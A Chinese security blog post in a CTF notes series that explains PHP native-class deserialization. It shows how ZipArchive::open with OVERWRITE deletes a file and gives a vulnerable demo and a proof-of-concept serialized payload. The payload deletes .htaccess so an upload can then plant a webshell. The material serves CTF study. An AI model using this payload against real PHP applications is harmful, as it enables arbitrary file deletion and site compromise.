User-Profile-Image
hankin
  • 5
请到[后台->外观->菜单]中设置菜单。
  • 分类
    • 靶机渗透
    • 计算机小技巧
    • 漏洞复现
    • 未分类
    • 数据结构
    • 内网渗透
    • 代码审计
    • XSS
    • WEB安全漏洞学习
    • Web
    • python
    • PHP
    • NodeJS
    • MYSQL
    • Misc
    • JavaScript
    • Docker
    • CTF相关知识点
    • CTFWP
    • Crypto
    • Cobalt Strike
  • 页面
  • 友链
    • 三哥的博客
    • Root师傅的博客
    • EDS师傅的博客
    • 天正哥的博客
    • 天尘翼师傅的博客
    • 熵增师傅的github
    • 信仰的博客
    • Jadore的博客
Help?

Please contact us on our email for need any support

Support
    首页   ›   CTF相关知识点   ›   正文
CTF相关知识点

原生类序列化

2021-01-05 15:23:29
416  0 0
Text.

原生类同名函数

ZipArchive::open($filename,$flag)

当$flag=ZipArchive::OVERWRITE时,就会将$filename的文件删除

<?php
$a = new ZipArchive();
$a -> open("test.txt" , ZipArchive::OVERWRITE);
?>

在同级目录下新建一个test.txt文件,当如上代码设置时访问该页面,test.txt就会被删除,该方法PHP全版本通杀。接下来以一个Demo为例对这种方法进行介绍。

example.php

<?php
class Upload
{
    function open($filename, $content)
    {
        echo "You wanna open " . $filename . "Content:" . $content;
    }
}
class Index
{
    public $upload;
    public $filename;
    public $content;
    function __construct($filename, $content)
    {
        $this->upload = new UpLoad();
        $this->filename = $filename;
        $this->content = $content;
    }
    function __destruct()
    {
        var_dump($this->upload);
        var_dump($this->content);
        var_dump($this->filename);
        $this->upload->open($this->filename, $this->content);
    }
}
unserialize($_GET['file']);

假设有这样一段代码,与其同级目录下有一个.htaccess文件和一个上传表单文件,我们希望绕过上传成功Getshell,但是.htaccess文件中的内容又严重阻碍了我们的操作,所以下面希望将该文件删除掉,那么就用到了ZipArchive这个类,同时我们也看到Demo中的$this->upload也存在open函数。那么构造POC:

<?php
class Index
{
    public $upload;
    public $filename;
    public $content;

    function __construct($filename, $content)
    {
        $this->filename = $filename;
        $this->content = $content;
    }
}

$a = new Index(".htaccess",ZipArchive::OVERWRITE);
$a -> upload = new ZipArchive();
echo urlencode(serialize($a));

将生成的内容,通过file参数传递过去就成功将.htaccess文件删除了,实现了任意文件删除的操作。这是因为我们反序列化的时候会调用__destruct魔术方法的,而那个方法里有一段这样的代码“$this->upload->open($this->filename, $this->content);”,所以我们构造的$a -> upload = new ZipArchive();就会在反序列化后触发到ZipArchive的open方法,同时第二个参数我们构造的也是ZipArchive::OVERWRITE,就满足了任意文件删除的条件了。

2021.3.11补充

PHP原生类小结

 

评论 (0)

点击这里取消回复。

欢迎您 游客  

近期文章
  • 记一次Docker问题排错
  • 免杀钓鱼XLSM
  • 彻底理解Kerberos认证
  • 免杀QuasarRAT
  • 密码保护:python反序列化免杀上线CS
近期评论
    文章归档
    • 2021年4月
    • 2021年3月
    • 2021年2月
    • 2021年1月
    • 2020年12月
    • 2020年11月
    • 2020年9月
    • 2020年7月
    • 2020年6月
    • 2020年5月
    • 2020年4月
    • 2020年3月
    • 2020年2月
    • 2020年1月
    分类目录
    • Cobalt Strike
    • Crypto
    • CTFWP
    • CTF相关知识点
    • Docker
    • JavaScript
    • Misc
    • MYSQL
    • NodeJS
    • PHP
    • python
    • Web
    • WEB安全漏洞学习
    • XSS
    • 代码审计
    • 内网渗透
    • 数据结构
    • 未分类
    • 漏洞复现
    • 计算机小技巧
    • 靶机渗透
    功能
    • 登录
    • 条目feed
    • 评论feed
    • WordPress.org
    分类目录
    Copyright © 2021 网站备案号: 蒙ICP备20000552号-1
    smarty_hankin 主题. Designed by hankin
    主页
    页面
    博主
    purplet 管理员
    努力并有所方向
    170 文章 0 评论 50994 浏览
    测试
    测试